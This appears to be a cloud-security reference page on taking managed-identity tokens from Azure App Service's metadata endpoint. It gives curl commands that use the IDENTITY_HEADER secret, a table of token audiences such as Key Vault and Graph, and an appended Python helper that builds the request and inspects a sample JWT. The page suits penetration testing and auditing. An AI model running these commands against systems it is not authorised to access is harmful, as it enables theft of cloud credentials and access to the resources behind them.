Azure App Service

Azure App Service is a managed platform for running web applications.

| Property | Value |
|---|---|
| Credentials delivery mechanism | Served through link-local metadata service |
| Protection type | Header requires value from environment variable |
| Exploitation primitives | Query arbitrary URL and Read environment variables |

Extracting credentials

The Azure App Service runtime injects an environment variable, $IDENTITY_HEADER, that contains a randomly generated token. This token must be passed in the X-IDENTITY-HEADER HTTP header on every call to the metadata service; requests without it are rejected.

The $IDENTITY_ENDPOINT environment variable contains the URL of the metadata service, which should generally be http://169.254.255.2:8081/msi/token.

Extracting credentials for a system-assigned managed identity

```bash
curl -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" \
    "$IDENTITY_ENDPOINT?resource=https://management.core.windows.net&api-version=2019-08-01"
```

Extracting credentials for a user-assigned managed identity

In this case, you also need the client ID of the user-assigned managed identity, passed as the client_id query parameter. The application needs this value to function, so it is typically available as an environment variable or in a configuration file.

```bash
CLIENT_ID=...

curl -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" \
    "$IDENTITY_ENDPOINT?resource=https://management.core.windows.net&api-version=2019-08-01&client_id=$CLIENT_ID"
```

Selecting the resource parameter to use

The value of the resource parameter depends on which API you intend to call with the resulting token. The metadata service returns a JWT whose audience (aud) claim is set to this resource, so a token minted for one resource is not accepted by another API.

Known valid values and their associated API documentation:

| Resource URL | Description |
|---|---|
| https://management.azure.com/ | Azure REST API (AzureRM) |
| https://management.core.windows.net/ | Azure REST API (Azure Classic) |
| https://vault.azure.net/ | Azure Key Vault REST API |
| https://servicebus.windows.net/ | Service Bus REST API (data plane) |
| https://batch.core.windows.net/ | Azure Batch REST API (data plane) |
| https://storage.azure.com | Azure Storage REST API (data plane) |
| https://managedhsm.azure.net/ | Azure Managed HSMs REST API |
| https://graph.microsoft.com | Microsoft Graph API |
| https://graph.windows.net/ | Azure AD Graph API (deprecated) |
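As an added example (not code from the original page), the Python helpers below build the metadata request described above from the endpoint, header and resource values, then inspect a returned JWT to confirm that its aud claim matches the requested resource and that it has not expired; this is what you want when auditing which resources an app's managed identity can actually mint tokens for. The sample token, tenant id and client id are constructed placeholders, and the signature is deliberately not verified.

```python
import base64
import json
from urllib.parse import urlencode

DEFAULT_API_VERSION = "2019-08-01"  # api-version used on this page


def build_token_request(endpoint, identity_header, resource,
                        api_version=DEFAULT_API_VERSION, client_id=None):
    """Return (url, headers) for the App Service metadata request.
    client_id is only needed for a user-assigned managed identity."""
    params = {"resource": resource, "api-version": api_version}
    if client_id:
        params["client_id"] = client_id
    return f"{endpoint}?{urlencode(params)}", {"X-IDENTITY-HEADER": identity_header}


def _b64url_decode(segment):
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_claims(token):
    """Decode the JWT payload WITHOUT verifying the signature (inspection only)."""
    _header, payload, _signature = token.split(".")
    return json.loads(_b64url_decode(payload))


def audit_token(token, requested_resource, now):
    """Check that aud matches the requested resource and the token is unexpired.
    A trailing slash on the audience is treated as insignificant."""
    claims = decode_jwt_claims(token)
    aud = claims.get("aud", "")
    return {"aud": aud,
            "aud_ok": aud.rstrip("/") == requested_resource.rstrip("/"),
            "expired": claims.get("exp", 0) <= now}


def _constructed_jwt(claims):
    # Build a syntactically valid JWT with a dummy signature for offline use.
    enc = lambda d: base64.urlsafe_b64encode(json.dumps(d).encode()).decode().rstrip("=")
    return f"{enc({'alg': 'RS256', 'typ': 'JWT'})}.{enc(claims)}.constructed-signature"


# Constructed sample token: tenant and client ids are placeholders, not real values.
SAMPLE_TOKEN = _constructed_jwt({"aud": "https://vault.azure.net",
                                 "iss": "https://sts.windows.net/<tenant-id-placeholder>/",
                                 "appid": "<client-id-placeholder>",
                                 "exp": 1_900_000_000})

if __name__ == "__main__":
    url, headers = build_token_request("http://169.254.255.2:8081/msi/token", "<identity-header>",
                                       "https://vault.azure.net/", client_id="<client-id-placeholder>")
    print(url, headers)
    print(audit_token(SAMPLE_TOKEN, "https://vault.azure.net/", now=1_700_000_000))
```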